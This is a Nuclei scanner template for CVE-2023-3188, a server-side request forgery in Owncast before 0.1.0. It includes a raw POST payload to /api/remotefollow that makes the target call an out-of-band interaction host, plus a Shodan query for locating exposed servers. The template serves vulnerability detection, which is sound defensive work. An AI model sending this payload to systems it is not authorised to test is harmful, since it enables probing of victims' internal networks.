id: CVE-2023-3188

info:
  name: Owncast - Server Side Request Forgery
  author: DhiyaneshDk
  severity: medium
  description: |
    Server-Side Request Forgery (SSRF) in GitHub repository owncast/owncast prior to 0.1.0.
  impact: |
    Unauthenticated attackers can exploit SSRF through the account parameter in the remotefollow API to probe internal network services and potentially access sensitive internal resources.
  remediation: |
    Update Owncast to version 0.1.0 or later that validates federated account addresses and restricts remote follow requests to authorized domains only.
  reference:
    - https://owncast.online/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3188
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-3188
    cwe-id: CWE-918
    epss-score: 0.48696
    epss-percentile: 0.97806
    cpe: cpe:2.3:a:owncast_project:owncast:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: owncast_project
    product: owncast
    shodan-query: html:"owncast"
  tags: cve,cve2023,owncast,oast,ssrf,vuln

http:
  - raw:
      - |
        POST /api/remotefollow HTTP/1.1
        Host: {{Hostname}}

        {"account":"a@{{interactsh-url}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
          - "dns"

      - type: word
        part: body
        words:
          - 'success":'
          - 'message":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"
# digest: 490a0046304402201882fbd8f646e5c4f8ed9aa4c0b660fb2e5d6af1aa3d426562788b7bdc17686402205bc3d7f4202adabd7c85581ef0cd5af27787b112320312df555301680abab0b6:922c64590222798bb761d5b6d8e72950